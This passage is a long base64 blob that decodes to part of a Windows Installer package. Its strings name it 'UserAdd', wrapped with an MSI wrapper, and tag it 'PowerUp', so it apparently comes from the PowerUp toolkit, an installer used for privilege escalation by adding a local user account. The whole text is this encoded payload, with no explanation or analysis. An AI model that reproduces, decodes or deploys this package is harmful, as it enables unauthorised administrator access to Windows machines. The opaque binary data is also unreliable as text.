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VsbGFibGVZTWluaW11bSB2YWx1ZSBhbGxvd2VkTWF4aW11bSB2YWx1ZSBhbGxvd2VkRm9yIGZvcmVpZ24ga2V5LCBOYW1lIG9mIHRhYmxlIHRvIHdoaWNoIGRhdGEgbXVzdCBsaW5rQ29sdW1uIHRvIHdoaWNoIGZvcmVpZ24ga2V5IGNvbm5lY3RzVGV4dDtGb3JtYXR0ZWQ7VGVtcGxhdGU7Q29uZGl0aW9uO0d1aWQ7UGF0aDtWZXJzaW9uO0xhbmd1YWdlO0lkZW50aWZpZXI7QmluYXJ5O1VwcGVyQ2FzZTtMb3dlckNhc2U7RmlsZW5hbWU7UGF0aHM7QW55UGF0aDtXaWxkQ2FyZEZpbGVuYW1lO1JlZ1BhdGg7Q3VzdG9tU291cmNlO1Byb3BlcnR5O0NhYmluZXQ7U2hvcnRjdXQ7Rm9ybWF0dGVkU0RETFRleHQ7SW50ZWdlcjtEb3VibGVJbnRlZ2VyO1RpbWVEYXRlO0RlZmF1bHREaXJTdHJpbmcgY2F0ZWdvcnlUZXh0U2V0IG9mIHZhbHVlcyB0aGF0IGFyZSBwZXJtaXR0ZWREZXNjcmlwdGlvbiBvZiBjb2x1bW5BZG1pbkV4ZWN1dGVTZXF1ZW5jZUFjdGlvbk5hbWUgb2YgYWN0aW9uIHRvIGludm9rZSwgZWl0aGVyIGluIHRoZSBlbmdpbmUgb3IgdGhlIGhhbmRsZXIgRExMLkNvbmRpdGlvbk9wdGlvbmFsIGV4cHJlc3Npb24gd2hpY2ggc2tpcHMgdGhlIGFjdGlvbiBpZiBldmFsdWF0ZXMgdG8gZXhwRmFsc2UuSWYgdGhlIGV4cHJlc3Npb24gc3ludGF4IGlzIGludmFsaWQsIHRoZSBlbmdpbmUgd2lsbCB0ZXJtaW5hdGUsIHJldHVybmluZyBpZXNCYWRBY3Rpb25EYXRhLlNlcXVlbmNlTnVtYmVyIHRoYXQgZGV0ZXJtaW5lcyB0aGUgc29ydCBvcmRlciBpbiB3aGljaCB0aGUgYWN0aW9ucyBhcmUgdG8gYmUgZXhlY3V0ZWQuICBMZWF2ZSBibGFuayB0byBzdXBwcmVzcyBhY3Rpb24uQWRtaW5VSVNlcXVlbmNlQWR2dEV4ZWN1dGVTZXF1ZW5jZUJpbmFyeVVuaXF1ZSBrZXkgaWRlbnRpZnlpbmcgdGhlIGJpbmFyeSBkYXRhLkRhdGFUaGUgdW5mb3JtYXR0ZWQgYmluYXJ5IGRhdGEuQ29tcG9uZW50UHJpbWFyeSBrZXkgdXNlZCB0byBpZGVudGlmeSBhIHBhcnRpY3VsYXIgY29tcG9uZW50IHJlY29yZC5Db21wb25lbnRJZEd1aWRBIHN0cmluZyBHVUlEIHVuaXF1ZSB0byB0aGlzIGNvbXBvbmVudCwgdmVyc2lvbiwgYW5kIGxhbmd1YWdlLkRpcmVjdG9yeV9EaXJlY3RvcnlSZXF1aXJlZCBrZXkgb2YgYSBEaXJlY3RvcnkgdGFibGUgcmVjb3JkLiBUaGlzIGlzIGFjdHVhbGx5IGEgcHJvcGVydHkgbmFtZSB3aG9zZSB2YWx1ZSBjb250YWlucyB0aGUgYWN0dWFsIHBhdGgsIHNldCBlaXRoZXIgYnkgdGhlIEFwcFNlYXJjaCBhY3Rpb24gb3Igd2l0aCB0aGUgZGVmYXVsdCBzZXR0aW5nIG9idGFpbmVkIGZyb20gdGhlIERpcmVjdG9yeSB0YWJsZS5BdHRyaWJ1dGVzUmVtb3RlIGV4ZWN1dGlvbiBvcHRpb24sIG9uZSBvZiBpcnNFbnVtQSBjb25kaXRpb25hbCBzdGF0ZW1lbnQgdGhhdCB3aWxsIGRpc2FibGUgdGhpcyBjb21wb25lbnQgaWYgdGhlIHNwZWNpZmllZCBjb25kaXRpb24gZXZhbHVhdGVzIHRvIHRoZSAnVHJ1ZScgc3RhdGUuIElmIGEgY29tcG9uZW50IGlzIGRpc2FibGVkLCBpdCB3aWxsIG5vdCBiZSBpbnN0YWxsZWQsIHJlZ2FyZGxlc3Mgb2YgdGhlICdBY3Rpb24nIHN0YXRlIGFzc29jaWF0ZWQgd2l0aCB0aGUgY29tcG9uZW50LktleVBhdGhGaWxlO1JlZ2lzdHJ5O09EQkNEYXRhU291cmNlRWl0aGVyIHRoZSBwcmltYXJ5IGtleSBpbnRvIHRoZSBGaWxlIHRhYmxlLCBSZWdpc3RyeSB0YWJsZSwgb3IgT0RCQ0RhdGFTb3VyY2UgdGFibGUuIFRoaXMgZXh0cmFjdCBwYXRoIGlzIHN0b3JlZCB3aGVuIHRoZSBjb21wb25lbnQgaXMgaW5zdGFsbGVkLCBhbmQgaXMgdXNlZCB0byBkZXRlY3QgdGhlIHByZXNlbmNlIG9mIHRoZSBjb21wb25lbnQgYW5kIHRvIHJldHVybiB0aGUgcGF0aCB0byBpdC5DdXN0b21BY3Rpb25QcmltYXJ5IGtleSwgbmFtZSBvZiBhY3Rpb24sIG5vcm1hbGx5IGFwcGVhcnMgaW4gc2VxdWVuY2UgdGFibGUgdW5sZXNzIHByaXZhdGUgdXNlLlRoZSBudW1lcmljIGN1c3RvbSBhY3Rpb24gdHlwZSwgY29uc2lzdGluZyBvZiBzb3VyY2UgbG9jYXRpb24sIGNvZGUgdHlwZSwgZW50cnksIG9wdGlvbiBmbGFncy5Tb3VyY2VDdXN0b21Tb3VyY2VUaGUgdGFibGUgcmVmZXJlbmNlIG9mIHRoZSBzb3VyY2Ugb2YgdGhlIGNvZGUuVGFyZ2V0Rm9ybWF0dGVkRXhjZWN1dGlvbiBwYXJhbWV0ZXIsIGRlcGVuZHMgb24gdGhlIHR5cGUgb2YgY3VzdG9tIGFjdGlvbkV4dGVuZGVkVHlwZUEgbnVtZXJpYyBjdXN0b20gYWN0aW9uIHR5cGUgdGhhdCBleHRlbmRzIGNvZGUgdHlwZSBvciBvcHRpb24gZmxhZ3Mgb2YgdGhlIFR5cGUgY29sdW1uLlVuaXF1ZSBpZGVudGlmaWVyIGZvciBkaXJlY3RvcnkgZW50cnksIHByaW1hcnkga2V5LiBJZiBhIHByb3BlcnR5IGJ5IHRoaXMgbmFtZSBpcyBkZWZpbmVkLCBpdCBjb250YWlucyB0aGUgZnVsbCBwYXRoIHRvIHRoZSBkaXJlY3RvcnkuRGlyZWN0b3J5X1BhcmVudFJlZmVyZW5jZSB0byB0aGUgZW50cnkgaW4gdGhpcyB0YWJsZSBzcGVjaWZ5aW5nIHRoZSBkZWZhdWx0IHBhcmVudCBkaXJlY3RvcnkuIEEgcmVjb3JkIHBhcmVudGVkIHRvIGl0c2VsZiBvciB3aXRoIGEgTnVsbCBwYXJlbnQgcmVwcmVzZW50cyBhIHJvb3Qgb2YgdGhlIGluc3RhbGwgdHJlZS5EZWZhdWx0RGlyVGhlIGRlZmF1bHQgc3ViLXBhdGggdW5kZXIgcGFyZW50J3MgcGF0aC5GZWF0dXJlUHJpbWFyeSBrZXkgdXNlZCB0byBpZGVudGlmeSBhIHBhcnRpY3VsYXIgZmVhdHVyZSByZWNvcmQuRmVhdHVyZV9QYXJlbnRPcHRpb25hbCBrZXkgb2YgYSBwYXJlbnQgcmVjb3JkIGluIHRoZSBzYW1lIHRhYmxlLiBJZiB0aGUgcGFyZW50IGlzIG5vdCBzZWxlY3RlZCwgdGhlbiB0aGUgcmVjb3JkIHdpbGwgbm90IGJlIGluc3RhbGxlZC4gTnVsbCBpbmRpY2F0ZXMgYSByb290IGl0ZW0uVGl0bGVTaG9ydCB0ZXh0IGlkZW50aWZ5aW5nIGEgdmlzaWJsZSBmZWF0dXJlIGl0ZW0uTG9uZ2VyIGRlc2NyaXB0aXZlIHRleHQgZGVzY3JpYmluZyBhIHZpc2libGUgZmVhdHVyZSBpdGVtLkRpc3BsYXlOdW1lcmljIHNvcnQgb3JkZXIsIHVzZWQgdG8gZm9yY2UgYSBzcGVjaWZpYyBkaXNwbGF5IG9yZGVyaW5nLkxldmVsVGhlIGluc3RhbGwgbGV2ZWwgYXQgd2hpY2ggcmVjb3JkIHdpbGwgYmUgaW5pdGlhbGx5IHNlbGVjdGVkLiBBbiBpbnN0YWxsIGxldmVsIG9mIDAgd2lsbCBkaXNhYmxlIGFuIGl0ZW0gYW5kIHByZXZlbnQgaXRzIGRpc3BsYXkuVXBwZXJDYXNlVGhlIG5hbWUgb2YgdGhlIERpcmVjdG9yeSB0aGF0IGNhbiBiZSBjb25maWd1cmVkIGJ5IHRoZSBVSS4gQSBub24tbnVsbCB2YWx1ZSB3aWxsIGVuYWJsZSB0aGUgYnJvd3NlIGJ1dHRvbi4wOzE7Mjs0OzU7Njs4Ozk7MTA7MTY7MTc7MTg7MjA7MjE7MjI7MjQ7MjU7MjY7MzI7MzM7MzQ7MzY7Mzc7Mzg7NDg7NDk7NTA7NTI7NTM7NTRGZWF0dXJlIGF0dHJpYnV0ZXNGZWF0dXJlQ29tcG9uZW50c0ZlYXR1cmVfRm9yZWlnbiBrZXkgaW50byBGZWF0dXJlIHRhYmxlLkNvbXBvbmVudF9Gb3JlaWduIGtleSBpbnRvIENvbXBvbmVudCB0YWJsZS5GaWxlUHJpbWFyeSBrZXksIG5vbi1sb2NhbGl6ZWQgdG9rZW4sIG11c3QgbWF0Y2ggaWRlbnRpZmllciBpbiBjYWJpbmV0LiAgRm9yIHVuY29tcHJlc3NlZCBmaWxlcywgdGhpcyBmaWVsZCBpcyBpZ25vcmVkLkZvcmVpZ24ga2V5IHJlZmVyZW5jaW5nIENvbXBvbmVudCB0aGF0IGNvbnRyb2xzIHRoZSBmaWxlLkZpbGVOYW1lRmlsZW5hbWVGaWxlIG5hbWUgdXNlZCBmb3IgaW5zdGFsbGF0aW9uLCBtYXkgYmUgbG9jYWxpemVkLiAgVGhpcyBtYXkgY29udGFpbiBhICJzaG9ydCBuYW1lfGxvbmcgbmFtZSIgcGFpci5GaWxlU2l6ZVNpemUgb2YgZmlsZSBpbiBieXRlcyAobG9uZyBpbnRlZ2VyKS5WZXJzaW9uVmVyc2lvbiBzdHJpbmcgZm9yIHZlcnNpb25lZCBmaWxlczsgIEJsYW5rIGZvciB1bnZlcnNpb25lZCBmaWxlcy5MYW5ndWFnZUxpc3Qgb2YgZGVjaW1hbCBsYW5ndWFnZSBJZHMsIGNvbW1hLXNlcGFyYXRlZCBpZiBtb3JlIHRoYW4gb25lLkludGVnZXIgY29udGFpbmluZyBiaXQgZmxhZ3MgcmVwcmVzZW50aW5nIGZpbGUgYXR0cmlidXRlcyAod2l0aCB0aGUgZGVjaW1hbCB2YWx1ZSBvZiBlYWNoIGJpdCBwb3NpdGlvbiBpbiBwYXJlbnRoZXNlcylTZXF1ZW5jZSB3aXRoIHJlc3BlY3QgdG8gdGhlIG1lZGlhIGltYWdlczsgb3JkZXIgbXVzdCB0cmFjayBjYWJpbmV0IG9yZGVyLkljb25QcmltYXJ5IGtleS4gTmFtZSBvZiB0aGUgaWNvbiBmaWxlLkJpbmFyeSBzdHJlYW0uIFRoZSBiaW5hcnkgaWNvbiBkYXRhIGluIFBFICguRExMIG9yIC5FWEUpIG9yIGljb24gKC5JQ08pIGZvcm1hdC5JbnN0YWxsRXhlY3V0ZVNlcXVlbmNlSW5zdGFsbFVJU2VxdWVuY2VMYXVuY2hDb25kaXRpb25FeHByZXNzaW9uIHdoaWNoIG11c3QgZXZhbHVhdGUgdG8gVFJVRSBpbiBvcmRlciBmb3IgaW5zdGFsbCB0byBjb21tZW5jZS5Mb2NhbGl6YWJsZSB0ZXh0IHRvIGRpc3BsYXkgd2hlbiBjb25kaXRpb24gZmFpbHMgYW5kIGluc3RhbGwgbXVzdCBhYm9ydC5NZWRpYURpc2tJZFByaW1hcnkga2V5LCBpbnRlZ2VyIHRvIGRldGVybWluZSBzb3J0IG9yZGVyIGZvciB0YWJsZS5MYXN0U2VxdWVuY2VGaWxlIHNlcXVlbmNlIG51bWJlciBmb3IgdGhlIGxhc3QgZmlsZSBmb3IgdGhpcyBtZWRpYS5EaXNrUHJvbXB0RGlzayBuYW1lOiB0aGUgdmlzaWJsZSB0ZXh0IGFjdHVhbGx5IHByaW50ZWQgb24gdGhlIGRpc2suICBUaGlzIHdpbGwgYmUgdXNlZCB0byBwcm9tcHQgdGhlIHVzZXIgd2hlbiB0aGlzIGRpc2sgbmVlZHMgdG8gYmUgaW5zZXJ0ZWQuQ2FiaW5ldElmIHNvbWUgb3IgYWxsIG9mIHRoZSBmaWxlcyBzdG9yZWQgb24gdGhlIG1lZGlhIGFyZSBjb21wcmVzc2VkIGluIGEgY2FiaW5ldCwgdGhlIG5hbWUgb2YgdGhhdCBjYWJpbmV0LlZvbHVtZUxhYmVsVGhlIGxhYmVsIGF0dHJpYnV0ZWQgdG8gdGhlIHZvbHVtZS5Qcm9wZXJ0eVRoZSBwcm9wZXJ0eSBkZWZpbmluZyB0aGUgbG9jYXRpb24gb2YgdGhlIGNhYmluZXQgZmlsZS5OYW1lIG9mIHByb3BlcnR5LCB1cHBlcmNhc2UgaWYgc2V0dGFibGUgYnkgbGF1bmNoZXIgb3IgbG9hZGVyLlN0cmluZyB2YWx1ZSBmb3IgcHJvcGVydHkuICBOZXZlciBudWxsIG9yIGVtcHR5LlJlZ2lzdHJ5UHJpbWFyeSBrZXksIG5vbi1sb2NhbGl6ZWQgdG9rZW4uUm9vdFRoZSBwcmVkZWZpbmVkIHJvb3Qga2V5IGZvciB0aGUgcmVnaXN0cnkgdmFsdWUsIG9uZSBvZiBycmtFbnVtLktleVJlZ1BhdGhUaGUga2V5IGZvciB0aGUgcmVnaXN0cnkgdmFsdWUuVGhlIHJlZ2lzdHJ5IHZhbHVlIG5hbWUuVGhlIHJlZ2lzdHJ5IHZhbHVlLkZvcmVpZ24ga2V5IGludG8gdGhlIENvbXBvbmVudCB0YWJsZSByZWZlcmVuY2luZyBjb21wb25lbnQgdGhhdCBjb250cm9scyB0aGUgaW5zdGFsbGluZyBvZiB0aGUgcmVnaXN0cnkgdmFsdWUuVXBncmFkZVVwZ3JhZGVDb2RlVGhlIFVwZ3JhZGVDb2RlIEdVSUQgYmVsb25naW5nIHRvIHRoZSBwcm9kdWN0cyBpbiB0aGlzIHNldC5WZXJzaW9uTWluVGhlIG1pbmltdW0gUHJvZHVjdFZlcnNpb24gb2YgdGhlIHByb2R1Y3RzIGluIHRoaXMgc2V0LiAgVGhlIHNldCBtYXkgb3IgbWF5IG5vdCBpbmNsdWRlIHByb2R1Y3RzIHdpdGggdGhpcyBwYXJ0aWN1bGFyIHZlcnNpb24uVmVyc2lvbk1heFRoZSBtYXhpbXVtIFByb2R1Y3RWZXJzaW9uIG9mIHRoZSBwcm9kdWN0cyBpbiB0aGlzIHNldC4gIFRoZSBzZXQgbWF5IG9yIG1heSBub3QgaW5jbHVkZSBwcm9kdWN0cyB3aXRoIHRoaXMgcGFydGljdWxhciB2ZXJzaW9uLkEgY29tbWEtc2VwYXJhdGVkIGxpc3Qgb2YgbGFuZ3VhZ2VzIGZvciBlaXRoZXIgcHJvZHVjdHMgaW4gdGhpcyBzZXQgb3IgcHJvZHVjdHMgbm90IGluIHRoaXMgc2V0LlRoZSBhdHRyaWJ1dGVzIG9mIHRoaXMgcHJvZHVjdCBzZXQuUmVtb3ZlVGhlIGxpc3Qgb2YgZmVhdHVyZXMgdG8gcmVtb3ZlIHdoZW4gdW5pbnN0YWxsaW5nIGEgcHJvZHVjdCBmcm9tIHRoaXMgc2V0LiAgVGhlIGRlZmF1bHQgaXMgIkFMTCIuQWN0aW9uUHJvcGVydHlUaGUgcHJvcGVydHkgdG8gc2V0IHdoZW4gYSBwcm9kdWN0IGluIHRoaXMgc2V0IGlzIGZvdW5kLkNvc3RJbml0aWFsaXplRmlsZUNvc3RDb3N0RmluYWxpemVJbnN0YWxsVmFsaWRhdGVJbnN0YWxsSW5pdGlhbGl6ZUluc3RhbGxBZG1pblBhY2thZ2VJbnN0YWxsRmlsZXNJbnN0YWxsRmluYWxpemVFeGVjdXRlQWN0aW9uUHVibGlzaEZlYXR1cmVzUHVibGlzaFByb2R1Y3Riei5XcmFwcGVkU2V0dXBQcm9ncmFtYnouQ3VzdG9tQWN0aW9uRGxsYnouUHJvZHVjdENvbXBvbmVudHtFREUxMEY2Qy0zMEY0LTQyQ0EtQjVDNy1BREI5MDVFNDVCRkN9QlouSU5TVEFMTEZPTERFUnJlZzlDQUU1N0FGN0I5RkI0RUYyNzA2Rjk1QjRCODNCNDE5U2V0UHJvcGVydHlGb3JEZWZlcnJlZGJ6Lk1vZGlmeVJlZ2lzdHJ5W0JaLldSQVBQRURfQVBQSURdYnouU3Vic3RXcmFwcGVkQXJndW1lbnRzX1N1YnN0V3JhcHBlZEFyZ3VtZW50c0A0YnouUnVuV3JhcHBlZFNldHVwW2J6LlNldHVwU2l6ZV0gIltTb3VyY2VEaXJdXC4iIFtCWi5JTlNUQUxMX1NVQ0NFU1NfQ09ERVNdICpbQlouRklYRURfSU5TVEFMTF9BUkdVTUVOVFNdW1dSQVBQRURfQVJHVU1FTlRTXV9Nb2RpZnlSZWdpc3RyeUA0YnouVW5pbnN0YWxsV3JhcHBlZF9Vbmluc3RhbGxXcmFwcGVkQDRQcm9ncmFtRmlsZXNGb2xkZXJieGp2aWx3N3xbQlouQ09NUEFOWU5BTUVdVEFSR0VURElSLlNvdXJjZURpclByb2R1Y3RGZWF0dXJlTWFpbiBGZWF0dXJlRmluZFJlbGF0ZWRQcm9kdWN0c0xhdW5jaENvbmRpdGlvbnNWYWxpZGF0ZVByb2R1Y3RJRE1pZ3JhdGVGZWF0dXJlU3RhdGVzUHJvY2Vzc0NvbXBvbmVudHNVbnB1Ymxpc2hGZWF0dXJlc1JlbW92ZVJlZ2lzdHJ5VmFsdWVzV3JpdGVSZWdpc3RyeVZhbHVlc1JlZ2lzdGVyVXNlclJlZ2lzdGVyUHJvZHVjdFJlbW92ZUV4aXN0aW5nUHJvZHVjdHNOT1QgUkVNT1ZFIH49IkFMTCIgQU5EIE5PVCBVUEdSQURFUFJPRFVDVENPREVSRU1PVkUgfj0gIkFMTCIgQU5EIE5PVCBVUEdSQURJTkdQUk9EVUNUQ09ERU5PVCBXSVhfRE9XTkdSQURFX0RFVEVDVEVERG93bmdyYWRlcyBhcmUgbm90IGFsbG93ZWQuQUxMVVNFUlMxQVJQTk9SRVBBSVJBUlBOT01PRElGWUJaLlZFUkZCWi5DT01QQU5ZTkFNRUVYRU1TSS5DT01CWi5JTlNUQUxMX1NVQ0NFU1NfQ09ERVMwQlouVUlOT05FX0lOU1RBTExfQVJHVU1FTlRTIEJaLlVJQkFTSUNfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSVJFRFVDRURfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSUZVTExfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSU5PTkVfVU5JTlNUQUxMX0FSR1VNRU5UU0JaLlVJQkFTSUNfVU5JTlNUQUxMX0FSR1VNRU5UU0JaLlVJUkVEVUNFRF9VTklOU1RBTExfQVJHVU1FTlRTQlouVUlGVUxMX1VOSU5TVEFMTF9BUkdVTUVOVFNiei5TZXR1cFNpemU5NzI4TWFudWZhY3R1cmVyUHJvZHVjdENvZGV7RDgyQUY2ODAtN0FDQS00QTQ4LUFFNTgtQUNCOEVFNDAwRDQyfVByb2R1Y3RMYW5ndWFnZTEwMzNQcm9kdWN0TmFtZVVzZXJBZGQgKFdyYXBwZWQgdXNpbmcgTVNJIFdyYXBwZXIgZnJvbSB3d3cuZXhlbXNpLmNvbSlQcm9kdWN0VmVyc2lvbjEuMC4wLjBXSVhfVVBHUkFERV9ERVRFQ1RFRFNlY3VyZUN1c3RvbVByb3BlcnRpZXNXSVhfRE9XTkdSQURFX0RFVEVDVEVEO1dJWF9VUEdSQURFX0RFVEVDVEVEU09GVFdBUkVcW0JaLkNPTVBBTllOQU1FXVxNU0kgV3JhcHBlclxJbnN0YWxsZWRcW0JaLldSQVBQRURfQVBQSURdTG9nb25Vc2VyW0xvZ29uVXNlcl1yZWcwNDkzNzZERTM1MTY0MjY2QTZGM0FDNDYxQjgxM0ZBNVVTRVJOQU1FW1VTRVJOQU1FXXJlZ0FGODhFMTMzNjZBMTc5QzRFQkZGNzYzRUVBM0RBMjA3RGF0ZVtEYXRlXXJlZzlCRjBGQzAxQUMxQTNBRDEzQTkzMEIwNjYyRTQyMzM0VGltZVtUaW1lXXJlZzRERDA4NzdDNjREN0ZGOTk1OUI0OEJDNUIwOTg1RURFV1JBUFBFRF9BUkdVTUVOVFNbV1JBUFBFRF9BUkdVTUVOVFNdV0lYX0RPV05HUkFERV9ERVRFQ1RFRFBvd2VyVXB7MTk5MWRmYWEtNWM1Mi00YTRiLWIyYWMtNmNkN2I2ZDk4ZTkxfYPEF